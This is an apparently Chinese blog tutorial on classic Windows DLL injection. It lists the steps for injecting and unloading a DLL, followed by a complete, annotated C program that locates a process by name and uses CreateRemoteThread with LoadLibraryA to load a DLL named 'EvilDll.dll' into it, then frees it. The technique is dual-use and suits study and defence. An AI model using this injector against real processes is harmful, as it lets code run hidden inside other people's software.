Pnig0s1992:算是複習了,最經典的教科書式的Dll注入。
總結一下基本的注入過程,分注入和解除安裝
注入Dll:
1,OpenProcess獲得要注入程序的句柄
2,VirtualAllocEx在遠端程序中開辟出一段記憶體,長度為strlen(dllname)+1;
3,WriteProcessMemory将Dll的名字寫入第二步開辟出的記憶體中。
4,CreateRemoteThread将LoadLibraryA作為線程函數,參數為Dll的名稱,建立新線程(LoadLibraryA的位址取自注入者自己程序中的kernel32;之所以可行,是因為同一次開機、同位元數的程序中kernel32的基址相同,故該位址在目標程序中同樣有效)
5,WaitForSingleObject等待遠端線程結束,再用CloseHandle關閉線程句柄
解除安裝Dll:
1,CreateRemoteThread将GetModuleHandle注入到遠端程序中,參數為被注入的Dll名
2,GetExitCodeThread将線程的退出碼作為Dll模組的句柄值(退出碼只有32位,HMODULE在64位程序中會被截斷,因此此法只適用於32位目標程序)。
3,CloseHandle關閉線程句柄
4,CreateRemoteThread将FreeLibrary注入到遠端程序中,參數為第二步獲得的句柄值。
5,WaitForSingleObject等待對象句柄傳回
6,CloseHandle關閉線程及程序句柄。
01.//Code By Pnig0s1992
02.//Date:2012,3,13
03.#include <stdio.h>
04.#include <Windows.h>
05.#include <TlHelp32.h>
06.
07.
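/*
 * Look up the PID of the first running process whose image name matches
 * lpProcessName. Despite the name, this returns a PID, not a handle.
 *
 * lpProcessName: image file name as reported by Toolhelp (e.g. "notepad.exe").
 *                Compared case-insensitively, since Windows file names are.
 * Returns the PID, or 0 when the name is NULL, the snapshot cannot be taken,
 * or no process matches (0 is not a valid user-process PID, so it doubles as
 * the "not found" sentinel).
 */
DWORD getProcessHandle(LPCTSTR lpProcessName)
{
    DWORD dwRet = 0;

    if (lpProcessName == NULL) {
        return dwRet;
    }

    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE) {
        /* GetLastError() is a DWORD (unsigned long): %lu, not %d. */
        printf("\n獲得程序快照失敗%lu", GetLastError());
        return dwRet;
    }

    /* dwSize must be filled in before the first call. Zero the rest so a
       failed Process32First cannot leave szExeFile as unterminated stack
       garbage that lstrcmpi would then read past. */
    PROCESSENTRY32 pe32 = {0};
    pe32.dwSize = sizeof(pe32);

    /* The original ignored Process32First's result and compared whatever was
       in pe32; only walk the list if the first entry was actually filled. */
    if (Process32First(hSnapShot, &pe32)) {
        do {
            if (lstrcmpi(pe32.szExeFile, lpProcessName) == 0) {
                dwRet = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnapShot, &pe32));
    }

    CloseHandle(hSnapShot);
    return dwRet;
}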
32.
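/*
 * Inject EvilDll.dll into the process named on the command line using the
 * classic CreateRemoteThread + LoadLibraryA technique, then unload it again
 * by running GetModuleHandleA and FreeLibrary in the target the same way.
 *
 * argv[1]: image name of the target process (e.g. "notepad.exe").
 * Returns 0 on success, -1 on any failure; diagnostics go to stdout.
 *
 * Assumptions the technique rests on (not verified by this code):
 *  - Injector and target must have the same bitness. The LoadLibraryA,
 *    GetModuleHandleA and FreeLibrary addresses are taken from the injector's
 *    own kernel32 and are only meaningful in the target if kernel32 is mapped
 *    at the same base there.
 *  - A thread exit code is a DWORD, so carrying the HMODULE back through
 *    GetExitCodeThread truncates it on 64-bit; the unload path is only
 *    reliable against 32-bit targets.
 *  - A bare DLL name is resolved by the TARGET's DLL search order, not the
 *    injector's working directory. Real use should pass a full path, both so
 *    the load succeeds and to avoid DLL search-order hijacking.
 *  - Non-UNICODE build: the (LPCTSTR) cast on argv[1] would silently hide a
 *    char*/wchar_t* mismatch if UNICODE were defined.
 */
INT main(INT argc, CHAR *argv[])
{
    INT rc = -1;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    LPVOID lpRemoteBuf = NULL;
    LPCSTR lpDllName = "EvilDll.dll";
    DWORD dwPid = 0;
    DWORD dwThreadId = 0;
    DWORD dwModule = 0;
    BOOL bGotCode = FALSE;
    SIZE_T cbName = 0;
    SIZE_T cbWritten = 0;

    /* The original dereferenced argv[1] unconditionally. */
    if (argc < 2 || argv[1] == NULL) {
        printf("\nusage: %s <process image name>", argv[0]);
        return -1;
    }

    dwPid = getProcessHandle((LPCTSTR)argv[1]);
    if (dwPid == 0) {
        printf("\nprocess not found: %s", argv[1]);
        return -1;
    }

    /* CreateRemoteThread requires CREATE_THREAD, QUERY_INFORMATION,
       VM_OPERATION, VM_READ and VM_WRITE on the process handle. The original
       asked only for VM_OPERATION|VM_WRITE, which is enough to write the name
       but makes every CreateRemoteThread fail with ERROR_ACCESS_DENIED. */
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
                           FALSE, dwPid);
    if (hProcess == NULL) {
        printf("\n擷取程序句柄錯誤%lu", GetLastError());
        return -1;
    }

    /* Room in the target for the DLL name plus its terminating NUL. */
    cbName = strlen(lpDllName) + 1;
    lpRemoteBuf = VirtualAllocEx(hProcess, NULL, cbName,
                                 MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (lpRemoteBuf == NULL) {
        printf("\nVirtualAllocEx failed %lu", GetLastError());
        goto cleanup;
    }

    /* WriteProcessMemory reports the byte count through a SIZE_T*. The
       original passed a DWORD*, which is a 4-byte variable receiving an
       8-byte store on 64-bit builds. */
    if (!WriteProcessMemory(hProcess, lpRemoteBuf, lpDllName, cbName, &cbWritten) ||
        cbWritten != cbName) {
        printf("\n寫入遠端程序記憶體空間出錯%lu。", GetLastError());
        goto cleanup;
    }

    /* Step 1: run LoadLibraryA(lpRemoteBuf) in the target. The cast works
       because both LPTHREAD_START_ROUTINE and LoadLibraryA take a single
       pointer-sized argument; the HMODULE it returns becomes the exit code. */
    hThread = CreateRemoteThread(hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)LoadLibraryA,
                                 lpRemoteBuf, 0, &dwThreadId);
    if (hThread == NULL) {
        printf("\n建立遠端線程失敗%lu", GetLastError());
        goto cleanup;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    hThread = NULL;

    /* Step 2: recover the module handle by running GetModuleHandleA on the
       same remote string; its return value comes back as the exit code. */
    hThread = CreateRemoteThread(hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)GetModuleHandleA,
                                 lpRemoteBuf, 0, &dwThreadId);
    if (hThread == NULL) {
        printf("\n建立遠端線程失敗%lu", GetLastError());
        goto cleanup;
    }
    WaitForSingleObject(hThread, INFINITE);
    bGotCode = GetExitCodeThread(hThread, &dwModule);
    CloseHandle(hThread);
    hThread = NULL;

    /* A 0 exit code means the DLL is not mapped in the target (e.g. it was
       not found on the target's search path), so there is nothing to free;
       the original would have called FreeLibrary(NULL) remotely. */
    if (!bGotCode || dwModule == 0) {
        printf("\nDLL not present in target after injection");
        goto cleanup;
    }

    /* Step 3: run FreeLibrary(hModule) in the target. The original passed the
       already-closed *thread* handle as the process handle here; it must be
       hProcess. The DWORD -> pointer widening is the 32-bit-only part. */
    hThread = CreateRemoteThread(hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)FreeLibrary,
                                 (LPVOID)(ULONG_PTR)dwModule, 0, &dwThreadId);
    if (hThread == NULL) {
        printf("\n建立遠端線程失敗%lu", GetLastError());
        goto cleanup;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    hThread = NULL;
    rc = 0;

cleanup:
    if (hThread != NULL) {
        CloseHandle(hThread);
    }
    /* The original never released the name buffer on success and used
       MEM_COMMIT on failure, which is not a valid VirtualFreeEx type.
       MEM_RELEASE requires a size of 0. */
    if (lpRemoteBuf != NULL) {
        VirtualFreeEx(hProcess, lpRemoteBuf, 0, MEM_RELEASE);
    }
    CloseHandle(hProcess);
    return rc;
}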
http://pnig0s1992.blog.51cto.com/393390/804484